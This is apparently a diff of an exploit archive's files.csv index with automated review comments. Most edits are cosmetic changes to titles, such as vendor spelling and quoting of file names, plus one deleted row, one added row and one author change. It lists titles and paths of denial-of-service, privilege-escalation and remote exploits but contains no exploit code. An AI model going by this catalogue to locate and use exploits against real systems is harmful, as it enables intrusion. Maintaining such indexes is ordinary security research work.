diff --git a/files.csv b/files.csv
index 82c801a8e..4179a1f3e 100755
--- a/files.csv
+++ b/files.csv
@@ -349,7 +349,7 @@ id,file,description,date,author,platform,type,port
 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0
 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0
 1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0
-1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0
+1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0
 1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0
 1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0
@@ -408,7 +408,7 @@ id,file,description,date,author,platform,type,port
 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0
 2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0
 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0
-2708,platforms/windows/dos/2708.c,"Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
+2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0
 2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0
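Review bot: The rewritten 2708 row, `NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)`, changes the vendor field from "Nullsoft" to "NullSoft", but the vendor itself spells its name "Nullsoft", so the old text was the correct one and the edit introduces an inconsistency rather than removing one. The same substitution is applied to entries 25061, 4703, 14789, 20820, 24571 and 25989 further down this diff. Suggest keeping `Nullsoft Winamp ...` on all seven rows so the vendor field stays searchable under the spelling used everywhere else in the index and in the vendor's own advisories.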
@@ -656,7 +656,7 @@ id,file,description,date,author,platform,type,port 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 -4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 +4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0 4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0 
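Review bot: The 4624 row is removed and re-added with no visible difference between the `-` and `+` text (`Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)` on both sides), so whatever changed is something this rendering does not show — presumably trailing whitespace or an invisible or non-ASCII character inside the description. It would help to say in the commit what was normalised, or to drop this hunk if it is whitespace-only, so that reviewers and anything that parses files.csv are not left to guess at a byte-level change in a row that otherwise looks untouched.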
@@ -717,7 +717,7 @@ id,file,description,date,author,platform,type,port
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0
 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
-5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
+5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0
 5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0
 5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0
@@ -899,7 +899,7 @@ id,file,description,date,author,platform,type,port
 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0
 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
-7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
+7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0
 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0
 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0
@@ -1357,7 +1357,7 @@ id,file,description,date,author,platform,type,port
 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0
 11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0
 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0
-11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
+11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,windows,dos,0
 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,windows,dos,0
@@ -3305,7 +3305,7 @@ id,file,description,date,author,platform,type,port
 25046,platforms/linux/dos/25046.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",linux,dos,0
 25047,platforms/linux/dos/25047.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,linux,dos,0
 25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos,0
-25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0
+25061,platforms/windows/dos/25061.txt,"NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0
 25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos,0
 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0
 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos,0
@@ -3433,8 +3433,8 @@ id,file,description,date,author,platform,type,port
 26526,platforms/windows/dos/26526.py,"VideoLAN VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0
 26548,platforms/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",hardware,dos,0
 26555,platforms/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos,0
-26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0
-26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0
+26557,platforms/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0
+26558,platforms/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0
 26575,platforms/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",windows,dos,0
 26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,windows,dos,0
 26601,platforms/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos,0
@@ -4439,7 +4439,7 @@ id,file,description,date,author,platform,type,port
 35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0
 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0
 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
-35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
+35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
 35842,platforms/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos,0
 35849,platforms/osx/dos/35849.c,"Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
 35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,multiple,dos,0
@@ -5264,6 +5264,7 @@ id,file,description,date,author,platform,type,port
 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
 40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
+40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5787,7 +5788,7 @@ id,file,description,date,author,platform,type,port
 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0
 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
 4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0
-4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
+4703,platforms/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
 4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Stack Overflow",2007-12-18,devcode,windows,local,0
 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow",2007-12-18,"SYS 49152",windows,local,0
 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0
@@ -5814,10 +5815,9 @@ id,file,description,date,author,platform,type,port
 5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0
 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0
 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0
-5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation",2008-04-04,qaaz,sco,local,0
-5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA - Privilege Escalation",2008-04-04,qaaz,sco,local,0
-5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - mcd Privilege Escalation",2008-04-04,qaaz,sco,local,0
-5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow",2008-04-04,shinnai,windows,local,0
+5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation",2008-04-04,qaaz,sco,local,0
+5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation",2008-04-04,qaaz,sco,local,0
+5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - 'mcd' Privilege Escalation",2008-04-04,qaaz,sco,local,0
 5424,platforms/linux/local/5424.txt,"AlsaPlayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local,0
 5442,platforms/windows/local/5442.cpp,"Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,windows,local,0
 5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,windows,local,0
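Review bot: Entry 5361 (`platforms/windows/local/5361.py`, "Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow") is deleted from the index in this hunk and nothing re-adds it; the hunk header's line count dropping from 10 to 9 confirms the row is gone rather than rewritten like its three SCO neighbours. Unless the row is re-inserted elsewhere in the diff or the exploit file is removed in the same commit, files.csv and the tree will disagree and any tooling that resolves ids through this CSV will stop finding 5361. Worth confirming the removal is intentional and, if so, saying why in the commit message, since the surrounding changes are all cosmetic description edits.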
@@ -6264,7 +6264,7 @@ id,file,description,date,author,platform,type,port
 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
-11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
+11139,platforms/windows/local/11139.c,"Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow",2010-01-16,Dz_attacker,windows,local,0
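Review bot: The new 11139 description `Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)` writes the affected versions as `5.05<5.13`, which reads as a comparison and matches neither the `a-b` range form it replaces nor the spaced `< x` upper-bound form used elsewhere in this file (`Linux Kernel < 2.6.16.18`, `SCO UnixWare < 7.1.4 p534589`, `AlsaPlayer < 0.99.80-rc3`). If an inclusive range is meant, keeping `Winamp 5.05-5.13` or writing `Winamp 5.05 - 5.13` is unambiguous; if the new notation is intended, at least space it as `5.05 < 5.13` so the operator is not glued to the version numbers and anyone grepping the index for a version string gets a consistent hit.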
@@ -6279,8 +6279,8 @@ id,file,description,date,author,platform,type,port
 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0
 11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0
 11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0
-11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
-11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
+11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
+11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0
 11267,platforms/windows/local/11267.py,"Winamp 5.572 - SEH Exploit",2010-01-26,TecR0c,windows,local,0
 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0
@@ -6343,7 +6343,7 @@ id,file,description,date,author,platform,type,port
 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
-12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0
+12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)",2010-04-16,blake,windows,local,0
 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0
 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
@@ -6388,7 +6388,7 @@ id,file,description,date,author,platform,type,port
 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0
-14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
+14068,platforms/windows/local/14068.py,"Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow (Metasploit)",2010-06-27,blake,windows,local,0
 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0
 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0
@@ -6484,7 +6484,7 @@ id,file,description,date,author,platform,type,port
 14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
 14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
 14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
-14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14789,platforms/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
 14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
 14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0
 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0
@@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0
 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
-27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
+27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
 27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
 27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0
 27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0
@@ -7986,7 +7986,7 @@ id,file,description,date,author,platform,type,port
 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
-40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,legalhackers,linux,local,0
+40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@@ -11199,8 +11199,8 @@ id,file,description,date,author,platform,type,port
 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
 19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
-19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
-19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
+19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
+19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0
 40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0
 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0
@@ -11856,7 +11856,7 @@ id,file,description,date,author,platform,type,port
 20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,windows,remote,0
